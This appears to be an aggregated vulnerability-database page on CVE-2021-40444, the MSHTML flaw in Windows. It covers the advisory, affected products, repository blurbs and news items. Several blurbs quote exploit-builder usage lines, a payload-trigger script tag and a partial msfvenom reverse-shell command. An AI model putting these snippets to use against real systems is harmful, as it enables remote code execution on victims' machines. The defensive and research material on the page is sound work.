CVSSv3: 8.8

CVE-2021-40444

Published: 15/09/2021 Updated: 28/12/2023
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.8 | Impact Score: 5.3 | Exploitability Score: 2.8
VMScore: 622
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: "Suspicious Cpl File Execution".

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

Please see the Mitigations and Workaround sections for important information about steps you can take to protect your system from this vulnerability.

UPDATE September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.

Vulnerability Trend

Vulnerable Products

microsoft windows server 2008 r2
microsoft windows 10 1607
microsoft windows server 2016
microsoft windows server 2008
microsoft windows rt 8.1
microsoft windows server 2012
microsoft windows 10
microsoft windows server 2019
microsoft windows 10 1809
microsoft windows 10 1909
microsoft windows 10 2004
microsoft windows server 2016 2004
microsoft windows 10 20h2
microsoft windows server 2016 20h2
microsoft windows 10 21h1
microsoft windows server 2022
microsoft windows 7
microsoft windows 8.1

Exploits

Proof of concept for the remote code execution vulnerability in MSDT known as Follina ...
This Metasploit module creates a malicious docx file that, when opened in Word on a vulnerable Windows system, will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine ...

Github Repositories

A curated list of my GitHub stars! Generated by starred

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Adblock Filter List Awk Brainfuck C C# C++ CMake CSS Clojure CoffeeScript Common Lisp Coq Crystal D2 Dart Dockerfile EJS Elixir Emacs Lisp F# Go HCL HTML Haskell Haxe Java JavaScript Jinja Jsonnet Julia Jupyter Notebook Kotlin Lean Lua MDX Makefile Markdown Mathematica Mustache Nim Nix OCaml Obj

Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444

Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444. How to disable ActiveX controls on an individual system? 1. To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the .reg file extension: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Curr

Microsoft MSHTML remote code execution vulnerability

SNP-Project: Microsoft MSHTML remote code execution vulnerability (CVE-2021-40444) was exploited, demonstrating and explaining all the steps in detail

CVE-2022-30190: This Repository Talks about the Follina MSDT from Defender Perspective. Index: About, Timeline, Understanding the Exploit, List of IOCs, Detection Strategy, Testing and Researching, Mitigation Plans, References. About: The bug is a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability reported by crazyman of the Shadow Chaser Group. Microsof

Various IOC

Malware Indicators of Compromise Hashes Formats MD5, SHA-1 and SHA256 Malwares Cobalt Strike RedLine Stealer and Distribute RedLine Stealer Trojanized dnSpy App and Dropped Malwares Abcbot Botnet - Xanthe Cryptomining Malware FluBot Botnet Phorpiex Botnet Blackmatter (For Windows v12, v13, v14, v16, v19, v20, v30 || For Linux v1602, v1604) Powerpoint attachments (A

CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit

Fully Weaponized CVE-2021-40444: Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files. Update 31/05/2022 - CVE-2022-30190 - Follina: Now the generator is able to generate the document required to exploit also the "Follina" attack (leveraging ms-msdt). Background: Although many PoC are already aro

Modified code so that we don't need to rely on CAB archives

CVE-2021-40444--CABless version. Update: Modified code so that we don't need to rely on CAB archives; the file "index.html" that triggers payload execution will contain 1 line of code only, inside a 'script' tag: <script>new ActiveXObject('htmlfile')Scriptlocation='wsf:///Downloads/cablessrar?wsf';</scrip

CVE-2021-40444 PoC: Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution). Creation of this script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file). You need to install lcab first (sudo apt-get install lcab). Check REPRODUCE.md for manual rep

Fully Weaponized CVE-2021-40444: Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files. Background: Although many PoC are already around the internet, I guessed to give myself a run to weaponizing this vulnerability, as what I found available lacked valuable information that it's worth sharing, also c

python-oletools: oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See www.decalage.info/python/oletools for m

This repo contains builders of cab file, html file, and docx file for the CVE-2021-40444 exploit

CVE-2021-40444 builders: This repo contains builders of cab file, html file, and docx file for the CVE-2021-40444 exploit. This repo is just for testing, research and educational purposes. You are responsible for how you use the code provided in this repo. The code is developed by reversing malware samples found in the wild and shared by various security researchers. The builders for thi

poc document

CVE-2022-30190 MS-MSDT Using Follina Attack Vector. Deniz Koc | June 9, 2022. On May 30, 2022, Microsoft issued CVE-2022-30190 regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability. It is basically a remote code execution technique used through MSDT and MS Office program, namely Microsoft Word. This attack takes place using malicious Word documents th

CVE-2021-40444 - Custom CAB templates from MakeCAB

CVE-2021-40444-CAB: CVE-2021-40444 - Custom CAB templates from MakeCAB. [%] CVE-2021-40444 - Custom CAB templates with Command [%] [%] python3 poc.py <calc.cab> <command/file.dll> [i] Example: python3 cab.py powershell.cab "powershell -C mspaint"; python3 cab.py power.cab calc.dll

VilNE Scanner

VilNE: VilNE Scanner. CURRENTLY DOWN - More recent browser updates have made this unreliable. Please see the issues page for known bugs (e.g. unreliable on Wifi)

Dridex_17092021: Today I happened upon a fresh Dridex dropper sample from @Slvlombardo. It uses a technique that I haven't personally seen previously, effectively placing the code that would have been inside a macro inside of an XML file within the container structure of the file. This is reminiscent of some of the stuff we've seen around CVE-2021-40444. Below is a

Active directory Attacks and Scripts

Bloodhound: Bloodhound, Sharphound, Cred dump, AS-REP Roasting, crackmapexec ntds, Impacket secretsdump, Kerberoasting, Lazagne, Mimikatz dcsync, Mimikatz Logonpasswords, Mimikatz minidump, Pwdump, READ NTDS.dit File with Shadow Copy, USEFUL Enumeration, Active Directory Enumeration, Bruteforce, Check smb version and server info, Enum Local Users, Enum Shares, rpcclient, Lateral Movement, Checking

This docx exploit uses res files inside a Microsoft .docx file to execute malicious files. This exploit is related to CVE-2021-40444

Docx-Exploit-2021: This docx exploit uses res files inside a Microsoft .docx file to execute malicious files. This exploit is related to CVE-2021-40444. If you can not reproduce, kindly message me on Telegram: LazarusRebor

CVE-2021-40444 POC

CVE-2021-40444 CVE-2021-40444 POC

Reverse engineering the "A Letter Before Court 4.docx" malicious files exploiting cve-2021-40444

cve-2021-40444: Reverse engineering the "A Letter Before Court 4.docx" malicious files exploiting cve-2021-40444. Files (including malicious word and cab-file) may be downloaded on any.run: app.any.run/tasks/36c14029-9df8-439c-bba0-45f2643b0c70/# Note! The domain name in the original malicious code is replaced with 127.0.0.1:8000 to avoid any mistakes executing m

MS-MSDT Follina CVE-2022-30190 PoC document generator

MS-MSDT Follina CVE-2022-30190 PoC: Malicious docx generator to exploit (Microsoft Office Word Remote Code Execution). Creation of this script is based on the CVE-2021-40444 PoC by LockedByte and writeup by Tothi. Using: First modify backup.html and replace the powershell payload. Right now it just pops a calc.exe using IEX('calc.exe'). python3 exploit.py generate <SR

CVE-2021-40444 Usage: Ensure to run setup.sh first as you will need a few directories. Once you have run the script, you should be able to run gen.py with the example given:- # Usage python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3 # Flag -d -> Our doc

This Repository Talks about the Follina MSDT from Defender Perspective

MSDT_CVE-2022-30190: This Repository Talks about the Follina MSDT from Defender Perspective. Index: About, Timeline, Understanding the Exploit, List of IOCs, Detection Strategy, Testing and Researching, Mitigation Plans, References. About: The bug is a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability reported by crazyman of the Shadow Chaser Group. Mic

panopticon-WizardSpider: www.cyjax.com/2022/07/15/who-is-trickbot/ www.wired.com/story/trickbot-malware-group-internal-messages/ www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/ www.analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel go.crowdstrike.com/rs/281-OBQ

2021 Velociraptor Competition: My 2021 Velociraptor Competition package contains multiple Windows Detection, Application, Event log and Scanner artifacts, four new MacOS artifacts and one Server artifact. These artifacts were created based on real-world Incident Response use-cases, with the mindset of an Incident Responder and a Threat Hunter. They build upon Velociraptor's

Phishing - phishing research

Phishing - network phishing attacks. Phishing is not only an outdoor sport, it is also a cyber-attack technique. This project records material related to phishing attacks, including good phishing techniques and tricks and notable real-world phishing project cases. Phishing attacks originate from technology yet go beyond it. Phishing attacks originate from deception, and the end point of deception is evasion. Studying social engineering techniques in depth and practising them actively, in many

Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit

Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit: CVE-2021-40444 EXPLOIT TO USE IN METASPLOIT, ALLOWS ATTACKERS TO GET REMOTE CODE EXECUTION THROUGH MICROSOFT OFFICE WORD BY INJECTING MALICIOUS CODE IN THE FILE

data-exfiltration: Windows javascript file and folder exfiltration exploit for outdated vulnerabilities. The javascript vulnerability uses the ActiveXObject vulnerability to get RCE. ActiveXObject was a vulnerability patched in 2021 (CVE-2021-40444). The java vulnerability uses a signed java applet's ability to gain privilege on the user device after the user accepts the apple

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.

CVE-2021-40444 docx Generate: docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution). Create a blank docx file, add a "Bitmap Image" object in the "Insert/Object" menu

Microsoft Office Word RCE reproduction (CVE-2022-30190)

CVE-2022-30190: Microsoft Office Word RCE reproduction (CVE-2022-30190). Vulnerability overview: An MS Office docx file can contain an external OLE object reference to an HTML file. There is an HTML scheme, ms-msdt:, that invokes the msdt diagnostic tool, which is able to execute arbitrary code (specified in the parameters). The result is a frightening attack vector: RCE obtained by opening a malicious docx file (without using macros). Getting started

CVE 2021 40444 Windows Exploit services.dll

CVE-2021-40444_CAB_archives: CVE-2021-40444 - Custom CAB templates from MakeCAB. Reference dll: github.com/Udyz/CVE-2021-40444-CAB/blob/main/calc.dll

CVE-2021-40444 Sample

CVE-2021-40444-Sample: Patch CAB: github.com/Udyz/CVE-2021-40444/edit/master/patch_cab.py

CVE-2021-40444 Analysis: This repository contains the deobfuscated exploit code for CVE-2021-40444 as recovered by Immersive Labs during their analysis. This repository supports the blog article that can be found at immersivelabs.com/resources/blog/analyzing-the-cve-2021-40444-exploit/

CVE2021-40444 Related Links: bazaar.abuse.ch/sample/d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745 bazaar.abuse.ch/sample/938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 bazaar.abuse.ch/sample/1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00 msrc.microsoft.com/update-guide/vulnerability/CVE-2021-

CNAM TP5: Generating an exploit for Microsoft WORD (CVE-2021-40444). The goal of this lab is to become familiar with exploiting memory corruption, via the exploitation of a simple stack overflow. Along the way, we will learn to use git, docker, and a debugger: gdb. Prerequisites: Use the "git clone" command to

An attempt to reproduce the Microsoft MSHTML Remote Code Execution (RCE) Vulnerability using the Metasploit Framework.

CVE-2021-40444-POC: An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability using Metasploit Framework; works best if not run in FlareVM. PREPARATION: Git clone the repository from github.com/lockedbyte/CVE-2021-40444. Prepare the dll template to be used later with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP

A curated list of my GitHub stars!

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ai analytics android angular ansible api arduino artificial-intelligence automation awesome awesome-list aws azure bash blockchain c chatgpt chrome-extension cli code compiler cpp csharp css cybersecurity data data-analysis data-visualization database deep-learning devops discord django docker d

APT Project Organized

APT attack scenario 1. Basic attack information. Target: R&B Insurance (R&B손해보험). Reason for the attack: to lock the important information of individuals or of several companies registered with the company using ransomware and demand money. Attack plan: apply to take part in the digital-vulnerable-groups service idea contest hosted by R&B Insurance

Open Source Intelligence Executive Summary: Conducting Open-Source Intelligence research on the banking industry, which has the highest risks and probable cyber-attacks in the Australian banking sector. The company profile in this case study enlists National Australia Bank, which is a premium-level banking service that offers more than managing money. NAB has a plethora of techn

[EXP] Ladon CVE-2021-40444 Office vulnerability reproduction. Vulnerability overview: On September 8 (Beijing time), NSFOCUS CERT observed that Microsoft had published a security advisory disclosing the Microsoft MSHTML remote code execution vulnerability. An attacker can craft a malicious ActiveX control for use by a Microsoft Office document that hosts the browser rendering engine; after successfully luring the user into opening the malicious document, the attacker can, on the target system, with that user's privi

MS-URI-Handlers: The information below was tested from my personal computer. Results will be different from your own. Primer: Anytime you make a request in the browser, add an external link to a document, etc., Windows first checks what protocol is specified. The most common are web requests that use HTTP and HTTPS such as: github.com

A malicious .cab creation tool for CVE-2021-40444

Caboom

This is a simulation of an attack by the Fancy Bear group (APT28) targeting high-ranking government officials in Western Asia and Eastern Europe

APT28 Adversary Simulation: This is a simulation of an attack by the Fancy Bear group (APT28) targeting high-ranking government officials in Western Asia and Eastern Europe. The attack campaign was active from October to November 2021. The attack chain starts with the execution of an Excel downloader sent to the victim via email which exploits an MSHTML remote code execution vulnerability

Ansible playbooks related to Cybersecurity

cyber-ansible: Ansible playbooks related to Cybersecurity. Keeping Windows systems up-to-date: Automated upgrade of Windows servers and workstations. The upgrade can be launched in a controlled way to different groups of boxes defined in the inventories. It takes care of Windows updates as well as packages installed through Chocolatey repositories. Tested on Windows 10 (64, 32bits

Recent Articles

IT threat evolution in Q3 2022. Non-mobile statistics
Securelist • AMR • 18 Nov 2022

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: According to Kaspersky Security Network, in Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...

CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction
Securelist • AMR • 06 Jun 2022

At the end of May, researchers from the nao_sec team reported a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier CVE-2022-30190. CVE-2022-30190 technical details Bri...

IT threat evolution in Q1 2022. Non-mobile statistics
Securelist • AMR • 27 May 2022

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: According to Kaspersky Security Network, in Q1 2022: Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe. Web Anti-Virus recognized 313,164,030 unique URLs as ma...

Microsoft's end-of-summer software security cleanse crushes more than 80 bugs
The Register • Thomas Claburn in San Francisco • 15 Sep 2021

Patch Tuesday fiesta also sees Adobe and SAP tidying up

Patch Tuesday For its September Patch Tuesday, Microsoft churned out fixes for 66 vulnerabilities, alongside 20 Chromium bugs in Microsoft Edge. Affected products include: Azure, Edge (Android, Chromium, and iOS), Office, SharePoint Server, Windows, Windows DNS, and the Windows Subsystem for Linux. Of these CVEs, three are rated critical, one is rated moderate, and the remainder are considered important. One of the publicly disclosed CVEs, dating back to September 7, resolves a critical zero-day...

Microsoft's end-of-summer software security cleanse crushes more than 80 bugs
The Register • Thomas Claburn in San Francisco • 15 Sep 2021

Azure agent in Linux guests fixed, MSHTML exploit tackled, and much more – Plus: Adobe and SAP issue updates

Patch Tuesday For its September Patch Tuesday, Microsoft churned out fixes for 66 vulnerabilities alongside 20 Chromium security bugs in Microsoft Edge. Affected products include: Azure, Edge (Android, Chromium, and iOS), Office, SharePoint Server, Windows, Windows DNS, and the Windows Subsystem for Linux. Of these CVEs, three are rated critical, one is rated moderate, and the remainder are considered important. One of the already publicly disclosed CVEs resolves a critical zero-day vulnerabilit...

Miscreants fling booby-trapped Office files at victims, no patch yet, says Microsoft
The Register • Iain Thomson in San Francisco • 07 Sep 2021

ActiveX and MSHTML, the gift that keeps on giving ... to intruders

In an advisory issued on Tuesday, Microsoft said some of its users were targeted by poisoned Office documents that exploit an unpatched flaw to hijack their Windows machines. The vulnerability, CVE-2021-40444, is described as a hole in MSHTML, Internet Explorer's browser engine. Miscreants are seemingly placing a malicious ActiveX control in an Office document and convincing victims to open or view it, potentially achieving remote code execution. "Microsoft is investigating reports of a remote c...

Exotic Lily is a business-like access broker for ransomware gangs
The Register • Jeff Burt • 01 Jan 1970

Google's TAG details operations of prolific group, including 9-to-5 workdays

A group with links to high-profile ransomware crews Conti and Diavol is working as an internet access broker (IAB) for a Russia-linked cybercriminal gang, according to Google's Threat Analysis Group (TAG). Exotic Lily gains access to vulnerable corporate networks then sells that access to the highest bidder among threat groups, which then run ransomware and other attacks against the victim. The group launches large-scale phishing campaigns, at one point sending as many as 5,000 emails a day to u...